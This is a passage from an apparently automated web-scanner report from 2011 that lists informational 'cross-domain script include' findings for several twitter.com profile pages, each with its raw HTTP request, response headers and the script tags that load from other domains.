<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/layout_newtwitter.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.557. http://twitter.com/townsandtrails

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /townsandtrails

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /townsandtrails HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234653-20665-42642
ETag: "a362469ed7aa0642e1eaeba7a678e470"
Last-Modified: Fri, 28 Jan 2011 17:10:53 GMT
X-Runtime: 0.01095
Content-Type: text/html; charset=utf-8
Content-Length: 50543
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.558. http://twitter.com/townsandtrails

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /townsandtrails

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /townsandtrails HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225028-55890-31920
ETag: "8cefd1f1479aaa09aab96f1e9191b50f"
Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT
X-Runtime: 0.01466
Content-Type: text/html; charset=utf-8
Content-Length: 50670
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.559. http://twitter.com/travis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /travis

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /travis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225035-81767-49969
ETag: "87ddebc7da76c7d19a026c1d7f912c12"
Last-Modified: Fri, 28 Jan 2011 14:30:35 GMT
X-Runtime: 0.01393
Content-Type: text/html; charset=utf-8
Content-Length: 56939
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.560. http://twitter.com/travis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /travis

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /travis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234668-30470-49371
ETag: "74f171d96b56e235d5f332cd7e461a2e"
Last-Modified: Fri, 28 Jan 2011 17:11:08 GMT
X-Runtime: 0.00791
Content-Type: text/html; charset=utf-8
Content-Length: 56213
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.561. http://twitter.com/tylerseguin92

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /tylerseguin92

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tylerseguin92 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:56 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266036-23768-37977
ETag: "259dab0c6ed9a5201ee9cf6df844e230"
Last-Modified: Sat, 29 Jan 2011 01:53:56 GMT
X-Runtime: 0.01340
Content-Type: text/html; charset=utf-8
Content-Length: 21949
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/twitter.js?1296261409" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/jquery.tipsy.min.js?1296261409" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a2.twimg.com/a/1296258363/javascripts/lib/gears_init.js?1296261409" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/geov1.js?1296261409" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296258363/javascripts/api.js?1296261409" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a3.twimg.com/a/1296258363/javascripts/lib/mustache.js?1296261409" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296258363/javascripts/dismissable.js?1296261409" type="text/javascript"></script>
...[SNIP]...

18.562. http://twitter.com/waynecountylife

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /waynecountylife

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /waynecountylife HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225036-43124-3354
ETag: "04a252192aa79528cad7c5c11d3825f3"
Last-Modified: Fri, 28 Jan 2011 14:30:36 GMT
X-Runtime: 0.35094
Content-Type: text/html; charset=utf-8
Content-Length: 54878
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIidodHRwOi8vdHdpdHRlci5jb20vd2F5bmVjb3Vu%250AdHlsaWZlOgxjc3JmX2lkIiUyZDVjNDY0MjVjZjk4MWU0NDI1ZGZkZWI1OTNl%250ANDIxYzoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--90d7bcbfc68d4b17546f6b6e6696899149d482a7; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.563. http://twitter.com/waynecountylife

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /waynecountylife

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /waynecountylife HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:11:08 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234668-81806-6620
ETag: "8574d4b4cfe431ac93d89a236e8e4999"
Last-Modified: Fri, 28 Jan 2011 17:11:08 GMT
X-Runtime: 0.01081
Content-Type: text/html; charset=utf-8
Content-Length: 54757
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.564. http://twitter.com/webandy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /webandy

Issue detail

The response dynamically includes the following scripts from other domains (the script tags highlighted in the response below):

http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306
http://www.google.com/jsapi
http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306
http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306
http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306
http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306

Request

GET /webandy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224919-86126-59712
ETag: "072bd7c69249b014a8eea541d0e13ce7"
Last-Modified: Fri, 28 Jan 2011 14:28:39 GMT
X-Runtime: 0.46070
Content-Type: text/html; charset=utf-8
Content-Length: 51273
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
